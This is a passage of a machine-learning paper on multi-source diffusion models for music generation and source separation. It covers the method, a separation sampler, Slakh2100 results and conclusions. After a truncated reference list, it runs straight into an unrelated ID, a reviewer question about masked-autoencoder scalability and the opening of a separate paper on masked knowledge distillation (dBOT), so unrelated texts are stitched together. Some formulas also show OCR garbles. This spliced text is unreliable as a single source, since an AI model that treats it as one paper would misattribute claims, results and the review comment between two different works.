first diffusion (score) based generative models in audio, tackling speech synthesis. Many subsequent models followed these preliminary works, mainly conditioned to solve particular tasks such as speech enhancement (Lu et al., 2021; Serrà et al., 2022; Sawata et al., 2023; Saito et al., 2023), audio upsampling (Lee & Han, 2021; Yu et al., 2023), MIDI-to-waveform (Mittal et al., 2021; Hawthorne et al., 2022), or spectrogram-to-MIDI generation (Cheuk et al., 2023). The first work in source-specific generation with diffusion models is CRASH (Rouard & Hadjerjes, 2021). Yang et al. (2023; Pascual et al., 2023; Liu et al., 2023) proposed text-conditioned diffusion models to generate general sounds, not focusing on restricted classes such as speech or music. Closer to our work, diffusion models targeting the musical domain are Riffusion (Forsgren & Märtiros, 2022) and Moûsai (Schneider et al., 2023). Riffusion fine-tunes Stable Diffusion (Rombach et al., 2022), a large pre-trained text-conditioned vision diffusion model, over STFT magnitude spectrograms. Moûsai performs generation in a latent domain, resulting in context lengths that surpass the minute. Our score network follows the design of the U-Net proposed in Moûsai, albeit using the waveform data representation. 2.2 AUDIO SOURCE SEPARATION Existing audio source separation models can be broadly classified into deterministic and generative. Deterministic source separators are parametric models that input the mixtures and systematically extract one or all sources. These models are typically trained with a regression loss (Gusó et al., 2022) on the estimated signal represented as waveform (Luis et al., 2019; Luo & Mesgarani, 2019; Défossez et al., 2019), STFT (Takahashi et al., 2018; Choi et al., 2021), or both (Défossez, 2021). On the other hand, generative source separation models based on (independent) Bayesian inference learn a prior model for each source, thus targeting the distributions \( \{p_n(x_n)\}_{n=1,...,N} \). The mixture is observed only during inference, where a likelihood function connects it to its constituent sources. The literature has explored different priors, such as GANs (Subakan & Smaragdis, 2018; Kong et al., Figure 2: Inference tasks with MSDM. Oblique lines represent the presence of noise in the signal, decreasing from left to right, with the highest noise level at time $T$ when we start the sampling procedure. Top-left: We generate all stems in a mixture, obtaining a total generation. Bottom-left: We perform partial generation (source imputation) by fixing the sources $x_1$ (Bass) and $x_3$ (Piano) and generating the other two sources $\hat{x}_2(0)$ (Drums) and $\hat{x}_4(0)$ (Guitar). We denote with $x_1(t)$ and $x_3(t)$, the noisy stems obtained from $x_1$ and $x_3$ via the perturbation kernel in Eq. (1). Right: We perform source separation by conditioning the prior with a mixture $y$, following Algorithm 1. The separation method closer to ours is NCSN-BASIS (Jayaram & Thickstun, 2020). This method was proposed for image source separation, using Langevin Dynamics to separate the mixtures with an NCSN score-based model. It employs a Gaussian likelihood function during inference, which, as we demonstrate experimentally, is sub-optimal compared to our novel Dirac-based likelihood function. The main difference between our method and other generative source separation methods (including NCSN-BASIS) is the modeling of the full joint distribution. As such, we can perform source separation and synthesize mixtures or subsets of stems with a single model. Contextual information between sources is explicitly modeled in (Manilow et al., 2022) and (Postolache et al., 2023b). The first work models the relationship between sources by training an orderless NADE estimator, which predicts a subset of the sources while conditioning on the input mixture and the remaining sources. The subsequent study achieves universal source separation (Kavalerov et al., 2019; Wisdom et al., 2020) through adversarial training, utilizing a context-based discriminator to model the relationship between sources. Both methods are deterministic and conditioned on the mixtures architecturally. The same architectural limitation is present in diffusion-based (Scheibler et al., 2023; Lutati et al., 2023) or diffusion-inspired (Plaja-Roglans et al., 2022) conditional approaches. Our method sets itself apart as it proposes a model not constrained architecturally by a mixture conditioner, so we can also perform unconditional generation. 3 BACKGROUND The foundation of our model lies in estimating the joint distribution of the sources $p(x_1, \ldots, x_N)$. Our approach is generative because we model an unconditional distribution (the prior). The different tasks are then solved at inference time, exploiting the prior. We employ a diffusion-based (Sohl-Dickstein et al., 2015; Ho et al., 2020) generative model trained via denoising score-matching (Song & Ermon, 2019) to learn the prior. Specifically, we present our formalism by utilizing the notation and assumptions established in (Karras et al., 2022). The central idea of score-matching (Hyvärinen, 2005; Kingma & LeCun, 2010; Vincent, 2011) is to approximate the “score” function of the target distribution $p(x)$, namely $V_x \log p(x)$, rather than the distribution itself. To effectively approximate the score in sparse data regions, denoising diffusion methods introduce controlled noise to the data and learn to remove it. Formally, the data distribution is perturbed with a Gaussian perturbation kernel: $$p(x(t) | x(0)) = \mathcal{N}(x(t); x(0), \sigma^2(t)I),$$ (1) where the parameter $\sigma(t)$ regulates the degree of noise added to the data. Following the authors in (Karras et al., 2022), we consider an optimal schedule given by $\sigma(t) = t$. With that choice of $\sigma(t)$, the forward evolution of a data point $x(t)$ in time is described by a probability flow ODE (Song et al., 2021): $$dx(t) = -\sigma(t)\nabla_{x(t)} \log p(x(t)) \, dt.$$ (2) For $t = T \gg 0$, a data point $x(T)$ is approximately distributed according to a Gaussian distribution $\mathcal{N}(x(t); 0, \sigma^2(T)I)$, from which sampling is straightforward. Eq. (2) can be inverted in time, resulting in the following backward ODE that describes the denoising process: $$dx(t) = \sigma(t)\nabla_{x(t)} \log p(x(t)) \, dt.$$ (3) Sampling can be performed integrating Eq. (3) with a standard ODE solver, starting from an initial (noisy) sample drawn from $\mathcal{N}(x(t); 0, \sigma^2(T)I)$. The score function, is approximated by a neural network $S^\theta(x(t), \sigma(t))$, minimizing the following score-matching loss: $$\mathbb{E}_{t \sim U([0,T])} \mathbb{E}_{x(0) \sim p(x(0))} \mathbb{E}_{x(t) \sim p(x(t)|x(0))} \| S^\theta(x(t), \sigma(t)) - \nabla_{x(t)} \log p(x(t) | x(0)) \|_2^2.$$ By expanding $p(x(t) | x(0))$ with Eq. (1), the score-matching loss simplifies to: $$\mathbb{E}_{t \sim U([0,T])} \mathbb{E}_{x(0) \sim p(x(0))} \mathbb{E}_{\epsilon \sim \mathcal{N}(0, \sigma^2(t)I)} \| D^\theta(x(0) + \epsilon, \sigma(t)) - x(0) \|_2^2,$$ where we define $S^\theta(x(t), \sigma(t)) := (D^\theta(x(t), \sigma(t)) - x(t))/\sigma^2(t)$. ### 4 Method #### 4.1 Multi-Source Audio Diffusion Models In our setup, we have $N$ distinct source waveforms $\{x_1, \ldots, x_N\}$ with $x_n \in \mathbb{R}^D$ for each $n$. The sources coherently sum to a mixture $y = \sum_{n=1}^{N} x_n$. We also use the aggregated form $x = (x_1, \ldots, x_N) \in \mathbb{R}^{N \times D}$. In this setting, multiple tasks can be performed: one may generate a consistent mixture $y$ or separate the individual sources $x$ from a given mixture $y$. We refer to the first task as generation and the second as source separation. A subset of sources can also be fixed in the generation task, and the others can be generated consistently. We call this task partial generation or source imputation. Our key contribution is the ability to perform all these tasks simultaneously by training a single multi-source diffusion model (MSDM), capturing the prior $p(x_1, \ldots, x_N)$. The model, illustrated in Figure 1, approximates the noisy score function: $$\nabla_{x(t)} \log p(x(t)) = \nabla_{(x_1(t), \ldots, x_N(t))} \log p(x_1(t), \ldots, x_N(t)),$$ with a neural network: $$S^\theta(x(t), \sigma(t)) : \mathbb{R}^{N \times D} \times \mathbb{R} \rightarrow \mathbb{R}^{N \times D},$$ (4) where $x(t) = (x_1(t), \ldots, x_N(t))$ denotes the sources perturbed with the Gaussian kernel in Eq. (1). We describe the three tasks (illustrated in Figure 2) using the prior distribution: - **Total Generation.** This task requires generating a plausible mixture $y$. It can be achieved by sampling the sources $\{x_1, \ldots, x_N\}$ from the prior distribution and summing them to obtain the mixture $y$. - **Partial Generation.** Given a subset of sources, this task requires generating a plausible accompaniment. We define the subset of fixed sources as $x_I$ and generate the remaining sources $x_{\neg I}$ by sampling from the conditional distribution $p(x_{\neg I} | x_I)$. - **Source Separation.** Given a mixture $y$, this task requires isolating the individual sources that compose it. It can be achieved by sampling from the posterior distribution $p(x | y)$. #### 4.2 Inference The three tasks of our method are solved during inference by discretizing the backward Eq. (3). Although different tasks require distinct score functions, they all originate directly from the prior score function in Eq. (4). We analyze each of these score functions in detail. For more details on the discretization method, refer to Section C.3. Algorithm 1 ‘MSDM Dirac’ sampler for source separation. Require: $I$ number of discretization steps for the ODE, $R$ number of corrector steps, $\{\sigma_i\}_{i \in \{0,\ldots,I\}}$ noise schedule, $S_{\text{churn}}$ 1: Initialize $\hat{x} \sim \mathcal{N}(0, \sigma_I^2 I)$ 2: $\alpha \leftarrow \min(S_{\text{churn}}/I, \sqrt{2} - 1)$ 3: for $i \leftarrow I$ to $1$ do 4: for $r \leftarrow R$ to $0$ do 5: $\hat{\sigma} \leftarrow \sigma_i \cdot (\alpha + 1)$ 6: $\epsilon \sim \mathcal{N}(0, I)$ 7: $\hat{x} \leftarrow \hat{x} + \sqrt{\hat{\sigma}^2 - \sigma_i^2} \epsilon$ 8: $z \leftarrow [\hat{x}_1:N-1, y - \sum_{n=1}^{N-1} \hat{x}_n]$ 9: for $n \leftarrow 1$ to $N - 1$ do 10: $g_n \leftarrow S^g_n(z, \hat{\sigma}) - S^g_N(z, \hat{\sigma})$ 11: end for 12: $g \leftarrow [g_1,\ldots,g_{N-1}]$ 13: $\hat{x}_1:N-1 \leftarrow \hat{x}_1:N-1 + (\sigma_{i-1} - \hat{\sigma}) g$ 14: $\hat{x} \leftarrow [\hat{x}_1:N-1, y - \sum_{n=1}^{N-1} \hat{x}_n]$ 15: if $r > 0$ then 16: $\epsilon \sim \mathcal{N}(0, I)$ 17: $\hat{x} \leftarrow \hat{x} + \sqrt{\sigma_i^2 - \sigma_{i-1}^2} \epsilon$ 18: end if 19: end for 20: end for 21: return $\hat{x}$ 4.2.1 Total Generation The total generation task is performed by sampling from Eq. (5) using the score function in Eq. (4). The mixture is then obtained by summing over all the generated sources. 4.2.2 Partial Generation In the partial generation task, we fix a subset of source indices $\mathcal{I} \subset \{1,\ldots,N\}$ and the relative sources $x_\mathcal{I} := \{x_n\}_{n \in \mathcal{I}}$. The goal is to generate the remaining sources $x_{\overline{\mathcal{I}}} := \{x_n\}_{n \in \overline{\mathcal{I}}}$ consistently, where $\overline{\mathcal{I}} = \{1,\ldots,N\} - \mathcal{I}$. To do so, we estimate the gradient of the conditional distribution: $$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p(x_{\overline{\mathcal{I}}}(t) \mid x_{\mathcal{I}}(t)).$$ This falls into the setting of imputation or, as it is more widely known in the image domain, inpainting. We approach imputation using the method in (Song et al., 2021). The gradient in Eq. (5) is approximated as follows: $$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p([x_{\overline{\mathcal{I}}}(t), \hat{x}_{\mathcal{I}}(t)]),$$ where $\hat{x}_{\mathcal{I}}$ is a sample from the forward process: $\hat{x}_{\mathcal{I}}(t) \sim \mathcal{N}(x_{\mathcal{I}}(t); x_{\mathcal{I}}(0), \sigma(t)^2 I)$. The square bracket operator denotes concatenation. Approximating the score function, we write: $$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p(x_{\overline{\mathcal{I}}}(t) \mid x_{\mathcal{I}}(t)) \approx S^g_{\overline{\mathcal{I}}}([x_{\overline{\mathcal{I}}}(t), \hat{x}_{\mathcal{I}}(t)], \sigma(t)), $$ where $S^g_{\overline{\mathcal{I}}}$ denotes the entries of the score network corresponding to the sources indexed by $\overline{\mathcal{I}}$. 4.2.3 Source Separation We view source separation as a specific instance of conditional generation, where we condition the generation process on the given mixture $y = y(0)$. This requires computing the score function of the posterior distribution: $$\nabla_{x(t)} \log p(x(t) \mid y(0)).$$ Standard methods for implementing conditional generation for diffusion models involve directly estimating the posterior score in Eq. (6) at training time (i.e., Classifier Free Guidance (Ho & Salimans, 2021)) or estimating the likelihood function $p(y(0) \mid x(t))$ and using the Bayes formula. to derive the posterior. The second approach typically involves training a separate model, often a classifier, for the likelihood score (i.e., Classifier Guidance \cite{Dhariwal2021}). In diffusion-based generative source separation, learning a likelihood model is typically unnecessary because the relationship between \( x(t) \) and \( y(t) \) is represented by a simple function, namely the sum. A natural approach is to model the likelihood function based on such functional dependency. This is the approach taken by \cite{Jayaram2020}, where they use a Gaussian likelihood function: \[ p(y(t) | x(t)) = N(y(t) | \sum_{n=1}^{N} x_n(t), \gamma^2(t) I), \] with the standard deviation given by a hyperparameter \( \gamma(t) \). The authors argue that aligning the \( \gamma(t) \) value to be proportionate to \( \sigma(t) \) optimizes the outcomes of their NCSN-BASIS separator. We present a novel approximation of the posterior score function in Eq. (6) by modeling \( p(y(t) | x(t)) \) as a Dirac delta function centered in \( \sum_{n=1}^{N} x_n(t) \): \[ p(y(t) | x(t)) = \mathbb{I}_{y(t) = \sum_{n=1}^{N} x_n(t)}. \] The complete derivation can be found in Appendix A and we present only the final formulation, which we call ‘MSDM Dirac’. The method constrains a source, without loss of generality \( x_N \), by setting \( x_N(t) = y(0) - \sum_{n=1}^{N-1} x_n(t) \) and estimates: \[ \nabla_{x_m(t)} \log p(x(t) | y(0)) \approx S_m^\theta((x_1(t), \ldots, x_{N-1}(t), y(0) - \sum_{n=1}^{N-1} x_n(t)), \sigma(t)) \] \[ - S_N^\theta((x_1(t), \ldots, x_{N-1}(t), y(0) - \sum_{n=1}^{N-1} x_n(t)), \sigma(t)), \] where \( 1 \leq m \leq N - 1 \) and \( S_m^\theta, S_N^\theta \) denote the entries of the score network corresponding to the \( m \)-th and \( N \)-th sources. Our approach models the limiting case wherein \( \gamma(t) \to 0 \) in the Gaussian likelihood function. This represents a scenario where the functional dependence between \( x(t) \) and \( y(t) \) becomes increasingly tight, thereby sharpening the conditioning on the given mixture during the generation process. The pseudo-code for the ‘MSDM Dirac’ source separation sampler, using the Euler ODE integrator of \cite{Karras2022}, is provided in Algorithm 1. The Euler ODE discretization logic uses the \( S_{\text{churn}} \) mechanism of \cite{Karras2022} and optional correction steps \cite{Song2021} (see Section C.3 for more details). The separation procedure can be additionally employed in the weakly-supervised source separation scenario, typically encountered in generative source separation \cite{Jayaram2020, Zhu2022, Postolache2023}. This scenario pertains to cases where we know that specific audio data belongs to a particular instrument class while not having access to sets of sources sharing a context. To adapt to this scenario, we assume independence between sources \( p(x_1, \ldots, x_N) = \prod_{n=1}^{N} p_n(x_n) \) and train a separate model for each source class. We call the resulting model ‘Independent Source Diffusion Model with Dirac Likelihood’ (‘ISDM Dirac’). We derive its formula together with formulas for the Gaussian versions ‘MSDM Gaussian’ and ‘ISDM Gaussian’ in Appendix B. 5 EXPERIMENTAL RESULTS We experiment on Slakh2100 \cite{Manilow2019}, a standard dataset for music source separation. We chose Slakh2100 because it has a significantly larger quantity of data (145h) than other multi-source waveform datasets like MUSDB18-HQ \cite{Rafii2019} (10h). The amount of data plays a decisive role in determining the quality of a generative model, making Slakh2100 a preferable choice. Nevertheless, in Appendix E we conduct a study of data efficiency on MUSDB18-HQ. Details on datasets, architecture, training, and sampling are provided in Appendix C. 5.1 MUSIC GENERATION The performance of MSDM on the generative tasks is tested through subjective and objective evaluation. Table 1: Comparison between total generation capabilities of MSDM (Slakh2100) and an equivalent architecture trained on Slakh2100 mixtures. Both subjective (quality and coherence, higher is better) and objective (FAD, lower is better) evaluations are shown. The quality and coherence columns refer to the average scores of the listening tests, with respective variances. | Model | FAD ↓ | Quality ↑ | Coherence ↑ | |----------------|-------|-----------|-------------| | MSDM | 6.55 | 6.51 ± 2.19 | 6.35 ± 2.36 | | Mixture Model | 6.67 | 6.15 ± 2.47 | 5.67 ± 2.60 | Table 2: Quantitative and qualitative results for the partial generation task on Slakh2100. We use both subjective (quality and density, higher is better) and objective (sub-FAD, lower is better) evaluation metrics. The sub-FAD metric is reported for all combinations of generated sources (B: Bass, D: Drums, G: Guitar, P: Piano). The quality and density columns refer to the average scores of the listening tests, with respective variances. | Slakh2100 | B | D | G | P | BD | BG | BP | DG | DP | GP | BDG | BDP | BGP | DGP | Quality ↑ | Density ↑ | |-----------|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----------|-----------| | MSDM | 0.45| 1.09| 0.11| 0.76| 2.09| 1.00| 2.32| 1.45| 1.82| 1.65| 2.93| 3.30| 4.90| 3.10| 6.3 ± 2.7 | 6.1 ± 2.6 | Subjective evaluation is done through listening tests, whose form format is reported in Appendix [F]. Concisely, we produce two forms, one for total generation and one for partial generation. In the first, subjects are asked to rate, from 1 to 10, the quality and instrument coherence (i.e., how the instruments sound plausible together) of 30 generated chunks, of which 15 are generated by MSDM and 15 by a model trained on mixtures (using the same diffusion architecture as MSDM). In the second one, knowing the fixed instruments, subjects are asked to rate, from 1 to 10, the quality and the density of the generated accompaniment. Namely, ‘quality’ tests how the full chunk sounds plausible with respect to the ground truth data, and ‘density’ tests how much the generated instruments are present in the chunk. We also provide examples of music and accompaniment generation [F]. For the objective evaluation of the generative tasks, we generalize the FAD protocol in Donahue et al. (2023) to our total and partial generation tasks with more than one source. Given $D_{\text{real}}$ a dataset of ground truth mixtures chunks and $\mathcal{I}$ a set indexing conditioning sources ($\emptyset$ for total generation), we build a dataset $D_{\text{gen}}$ whose elements are the sum between conditioning sources (indexed by $\mathcal{I}$) and the respective generated sources. We define the sub-FAD as $FAD(D_{\text{real}}, D_{\text{gen}})$. We use VGGish embeddings (Hershey et al., 2017) for computing the metric. Results for total and partial generations are reported in Tables 1 and 2 respectively, both for subjective and objective evaluations. Results in Table 1 show a minimal difference between the model trained on mixtures and MSDM. This suggests that, given the same dataset and architecture, the generative power of MSDM is the same as the model trained on mixtures while being able to perform separation and partial generation. Table 2 shows via the subjective results that the task of partial generation can be performed with non-trivial quality. Our method being the first able to generate any combination of partial sources, does not have a competitor baseline for the objective metrics. We thus report the sub-FAD results of our method as baseline metrics for future research. 5.2 Source Separation In order to evaluate source separation, we use the scale-invariant SDR improvement (SI-SDR$_I$) metric (Roux et al., 2019). The SI-SDR between a ground-truth source $x_n$ and an estimate $\hat{x}_n$ is defined as: $$\text{SI-SDR}(x_n, \hat{x}_n) = 10 \log_{10} \frac{\|\alpha x_n\|^2 + \epsilon}{\|\alpha x_n - \hat{x}_n\|^2 + \epsilon},$$ where $\alpha = \frac{x_n^T \hat{x}_n + \epsilon}{\|x_n\|^2 + \epsilon}$ and $\epsilon = 10^{-8}$. The improvement with respect to the mixture baseline is defined as $\text{SI-SDR}_I = \text{SI-SDR}(x_n, \hat{x}_n) - \text{SI-SDR}(x_n, y)$. On Slakh, we compare our supervised MSDM and weakly-supervised MSDM with the ‘Demucs’ (Défossez et al., 2019) and ‘Demucs + Gibbs (512 steps)’ regressor baselines from Manilow et al. [https://gladia-research-group.github.io/multi-source-diffusion-models/] Table 3: Quantitative results for source separation on the Slakh2100 test set. We use the SI-SDR$_1$ as our evaluation metric (dB – higher is better). We present both the supervised (‘MSDM Dirac’, ‘MSDM Gaussian’) and weakly-supervised (‘ISDM Dirac’, ‘ISDM Gaussian’) separators and specify if a correction step is used. ‘All’ reports the average over the four stems. | Model | Bass | Drums | Guitar | Piano | All | |------------------------------|------|-------|--------|-------|-----| | Demucs (Défossez et al., 2019) | 15.77 | 19.44 | 15.30 | 13.92 | 16.11 | | Manilow et al., 2022 | | | | | | | Demucs + Gibbs (512 steps) | 17.16 | 19.61 | **17.82** | **16.32** | **17.73** | | Manilow et al., 2022 | | | | | | **Dirac Likelihood** | ISDM | 18.44 | 20.19 | 13.34 | 13.25 | 16.30 | | ISDM (correction) | **19.36** | **20.90** | 14.70 | 14.13 | 17.27 | | MSDM | 16.21 | 17.47 | 12.71 | 13.29 | 14.92 | | MSDM (correction) | 17.12 | 18.68 | 15.38 | 14.73 | 16.48 | **Gaussian Likelihood** (Jayaram & Thickstun, 2020) | ISDM | 13.48 | 18.09 | 11.93 | 11.17 | 13.67 | | ISDM (correction) | 14.27 | 19.10 | 12.74 | 12.20 | 14.58 | | MSDM | 12.53 | 16.82 | 12.98 | 9.29 | 12.90 | | MSDM (correction) | 13.93 | 17.92 | 14.19 | 12.11 | 14.54 | The state-of-the-art for supervised music source separation on Slakh2100, aligning with the evaluation procedure of (Manilow et al., 2022). We evaluate over the test set of Slakh2100, using chunks of 4 seconds in length (with an overlap of two seconds) and filtering out silent chunks and chunks consisting of only one source, given the poor performance of SI-SDR$_1$ on such segments. We report results comparing our Dirac score posterior with the Gaussian score posterior of (Jayaram & Thickstun, 2020), using the best parameters of the ablations in Appendix D and 150 inference steps. Results are reported in Table 3 and show that: (i) The Dirac likelihood improves overall results, even outperforming the state of the art when applied to ISDM on Bass and Drums (ii) adding a correction step is beneficial (iii) MSDM with Dirac likelihood and one step of correction gives results comparable with the state of the art and superior to standard Demucs overall. We stress again that, while the baselines can perform the separation task alone, MSDM can also perform generative tasks. 6 CONCLUSIONS We have presented a general method, based on denoising score-matching, for source separation, mixture generation, and accompaniment generation in the musical domain. Our approach utilizes a single neural network trained once, with tasks differentiated during inference. Moreover, we have defined a new sampling method for source separation. We quantitatively tested the model on source separation, obtaining results comparable to state-of-the-art regressor models. We qualitatively and quantitatively tested the model on total and partial generation. Our model’s ability to handle both total and partial generation and source separation positions it as a significant step toward the development of general audio models. This flexibility paves the way for more advanced music composition tools, where users can easily control and manipulate individual sources within a mixture. 6.1 LIMITATIONS AND FUTURE WORK The amount of available contextual data constrains the performance of our model. To address this, pre-separating mixtures and training on the separations, as demonstrated in (Donahue et al., 2023), may prove beneficial. Additionally, it would be intriguing to explore the possibility of extending our method to situations where the sub-signals are not related by addition but rather by a known but different function. Finally, future work could adapt the model to jointly model MIDI information (for example, extracted from sources (Lin et al., 2021)) for further control. ACKNOWLEDGEMENTS The authors were partially supported by the ERC grant no. 802554 (SPECGEO), PRIN 2020 project no. 2020TA3K9N (LEGO.AI), PRIN 2022 project no. 2022AL45R2 (EYE-FI.AI, CUP H53D2300350-0001), and PNRR MUR project no. PE0000013-FAIR. REFERENCES Andrea Agostinelli, Timo I Denk, Zalán Borsos, Jesse Engel, Mauro Verzetti, Antoine Caillon, Qingqing Huang, Aren Jansen, Adam Roberts, Marco Tagliasacchi, et al. Musiclm: Generating music from text. *arXiv preprint arXiv:2301.11325*, 2023. Zalán Borsos, Raphaël Marinier, Damien Vincent, Eugene Kharitonov, Olivier Pietquin, Matt Sharifi, Dominik Roblek, Olivier Teboul, David Grangier, Marco Tagliasacchi, et al. Audiolm: a language modeling approach to audio generation. *IEEE/ACM Transactions on Audio, Speech, and Language Processing*, 2023. Nanxin Chen, Yu Zhang, Heiga Zen, Ron J Weiss, Mohammad Norouzi, and William Chan. Wavegrad: Estimating gradients for waveform generation. In *International Conference on Learning Representations*, 2021. URL https://openreview.net/forum?id=NsMLjcFaO8O. Kin Wai Cheuk, Ryosuke Sawata, Toshimitsu Uesaka, Naoki Murata, Naoya Takahashi, Shusuke Takahashi, Dorien Herremans, and Yuki Mitsufuji. Diffroll: Diffusion-based generative music transcription with unsupervised pretraining capability. In *ICASSP 2023-2023 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 1–5. IEEE, 2023. Woosung Choi, Minseok Kim, Jaehwa Chung, and Soonyoung Jung. Lasafi: Latent source attentive frequency transformation for conditioned source separation. In *ICASSP 2021-2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 171–175. IEEE, 2021. Alexandre Défossez. Hybrid spectrogram and waveform source separation. In *Proceedings of the ISMIR 2021 Workshop on Music Source Separation*, 2021. Alexandre Défossez, Nicolas Usunier, Léon Bottou, and Francis Bach. Music source separation in the waveform domain. *arXiv preprint arXiv:1911.13254*, 2019. Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. In M. Ranzato, A. Beygelzimer, Y. Dauphin, P.S. Liang, and J. Wortman Vaughan (eds.), *Advances in Neural Information Processing Systems*, volume 34, pp. 8780–8794. Curran Associates, Inc., 2021. URL https://proceedings.neurips.cc/paper/2021/file/49ad23d1ec9fa4bd8d77d02681df5cfa-Paper.pdf. Prafulla Dhariwal, Heewoo Jun, Christine Payne, Jong Wook Kim, Alec Radford, and Ilya Sutskever. Jukebox: A generative model for music. *arXiv preprint arXiv:2005.00341*, 2020. Chris Donahue, Julian McAuley, and Miller Puckette. Adversarial audio synthesis. In *International Conference on Learning Representations*, 2019. Chris Donahue, Antoine Caillon, Adam Roberts, Ethan Manilow, Philippe Esling, Andrea Agostinelli, Mauro Verzetti, Ian Simon, Olivier Pietquin, Neil Zeghidour, et al. Singsong: Generating musical accompaniments from singing. *arXiv preprint arXiv:2301.12662*, 2023. URL https://arxiv.org/abs/2301.12662. Seth* Forsgren and Hayk* Martiros. Riffusion - Stable diffusion for real-time music generation, 2022. URL https://riffusion.com/about. Enric Gusó, Jordi Pons, Santiago Pascual, and Joan Serrà. On loss functions and evaluation metrics for music source separation. In *ICASSP 2022-2022 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 306–310. IEEE, 2022.
xmQMz9OPF5
Following my question above, another perspective to understand this phenomenon is due to the limited scalability [1] of asymmetric masking architecture proposed in MAE, which is also utilized as the main architecture in this work. While in Swinv2 and EVA, the MIM pre-training has been quite important for ViT training of giant sizes. Does the implementation of masking also affect the scalability of pre-training?
EXPLORING TARGET REPRESENTATIONS FOR MASKED AUTOENCODERS Xingbin Liu\textsuperscript{1,2}\textsuperscript{*} Jinghao Zhou\textsuperscript{2}\textsuperscript{*} Tao Kong\textsuperscript{2}\textsuperscript{*} Xianming Lin\textsuperscript{1}\textsuperscript{†} Rongrong Ji\textsuperscript{1} \textsuperscript{1}Xiamen University \textsuperscript{2}ByteDance ABSTRACT Masked autoencoders have become popular training paradigms for self-supervised visual representation learning. These models randomly mask a portion of the input and reconstruct the masked portion according to assigned target representations. In this paper, we show that a careful choice of the target representation is unnecessary for learning good visual representation. Driven by this observation, we propose a multi-stage masked distillation pipeline and use a randomly initialized model as the teacher, enabling us to effectively train high-capacity models without any effort to carefully design the target representation. On various downstream tasks of classification, transfer learning, object detection, and semantic segmentation, the proposed method to perform masked knowledge distillation with bootstrapped teachers (dBOT) outperforms previous self-supervised methods by nontrivial margins. We hope our findings, as well as the proposed method, could motivate people to rethink the roles of target representations in pre-training masked autoencoders. The code and pre-trained models are publicly available at https://github.com/liuxingbin/dbot. 1 INTRODUCTION Masked Image Modeling (MIM) (He et al., 2022; Wei et al., 2022a; Baevski et al., 2022; Zhou et al., 2021) has recently become an active research topic in the field of visual representation learning and establishes strong performance for vision recognition tasks, e.g., image classification, object detection, and semantic segmentation, which also surpasses traditional supervised learning (Touvron et al., 2021) mechanism. To be specific, MIM randomly masks a portion of the input and then reconstructs the masked portion according to the transformed target, formulated as $$\min_{\theta} \mathbb{E}_{x \sim D} \mathcal{M}(\mathcal{T}(x \odot (1 - M)), f_\theta(x \odot M)),$$ where “$\odot$” means element-wise product; $M$ is the patch mask; “$x \odot M$” represents “unmasked patches” and vice versa; $f_\theta(\cdot)$ is the learnable network to be pre-trained; $\mathcal{T}$ is the transformation function generating the reconstructed target. $\mathcal{T}$ can either be a parameterized network or a traditional image feature transformation method; $\mathcal{M}(\cdot, \cdot)$ is the similarity measurement, e.g., $l_2$-distance (He et al., 2022). A masked image passed through the network $f_\theta(x \odot M)$ to reconstruct the visual representation of the intact image with transformation $\mathcal{T}(x \odot (1 - M))$. A crucial problem of MIM is how to choose the reconstructed target, i.e., $\mathcal{T}(\cdot)$ in Eq. (1). Previous methods use disparate teacher networks to generate the reconstruction target. BEiT (Bao et al., 2022) employs a pre-trained DALL-E (Ramesh et al., 2021) as the teacher network. In MaskFeat (Wei et al., 2022a), authors use HOG (Dalal & Triggs, 2005), MoCo (He et al., 2020) and DINO (Caron et al., 2021) features to perform MIM; MVP (Wei et al., 2022b) employs a multi-modality model, CLIP (Radford et al., 2021), which is pre-trained by rich image-text pairs. MAE (He et al., 2022) uses image pixels as the target, which functions likewise to a randomly initialized teacher network, as demonstrated in Appendix B.1. iBOT (Zhou et al., 2021) and data2vec (Baevski et al., 2022) use the exponential moving average (EMA) strategy to update teacher’s parameters $\phi$. Though different methods differ in their architectural designs and optimization, the choice of the teacher network lies crucial for each method and calls for a systematic study. In this work, we paraphrase a term Masked *Equal contribution. †Corresponding author([email protected]). Knowledge Distillation (MKD) to focus our discussion on a special case of MIM where the target is generated by a parameterized network (teacher network), i.e., \( T(\cdot) = h_\phi(\cdot) \). In this setting, \( T \) is the teacher network, and \( f \) is the student network. The purpose of our work is to investigate whether a careful design of the teacher network for MKD matters. Such exploration is nontrivial given that different teacher networks contain different knowledge we endued into the teacher network, which may induce diverse behaviors for the student networks. And the painstaking selection of the target representations in the field of MIM. To this end, we compare student networks distilled by four teacher networks with different computation pipelines, i.e., DINO (Caron et al., 2021) for contrastive learning, MAE (He et al., 2022) for masked autoencoding, DeiT (Touvron et al., 2021) for supervised learning, and DALL-E (Ramesh et al., 2021) for autoregressive generation. Four teachers are all pre-trained on ImageNet-1K for a fair comparison. To our surprise, although the behaviors of the teacher networks are very different, the distilled student networks share similar characters after several stages of MKD: (i) the performance variance between student networks distilled from different teachers rapidly decreases. (ii) the model weights and output features across layers within the networks share similar properties. Such observations indicate that the design of target representation is not essential when pre-trained with multi-stage, i.e., teacher networks do not matter with multi-stage masked knowledge distillation. Exceptionally, we use a randomly initialized model as teacher to perform multi-stage masked knowledge distillation, and find that it performs as well as those initialized by pre-trained models with the exact same settings! Using a random model as teachers not only avoids an extra pre-training stage, but also alleviates the painstaking selection of the target representations. Based on the above studies and observations, we naturally propose to perform masked knowledge distillation with bootstrapped teachers, short as dBOT. Specifically, masked knowledge distillation is performed repeatedly in multiple stages. At the end of each stage, we assign the student’s weight to the teacher and re-initialize the student’s weight to continue masked knowledge distillation. With simple yet effective design that enables pre-training starting from randomly initialized teachers, dBOT achieves 84.5%, 86.6%, and 88.0% top-1 fine-tuning accuracy on ImageNet-1K (Deng et al., 2009) with ViT-B/16, ViT-L/16, and ViT-H/14, respectively, significantly surpassing previous states of the art, MAE. Beyond that, dBOT achieves 52.7 and 56.0 AP\(_{box}\) for object detection on COCO (Lin et al., 2014), as well as 49.5 and 54.5 mIoU for semantic segmentation on ADE20K (Zhou et al., 2017), with ViT-B/16 and ViT-L/16 respectively. We also explore MKD with teachers of larger sizes, further boosting model performances on various visual tasks. 2 RELATED WORK 2.1 SELF-SUPERVISED 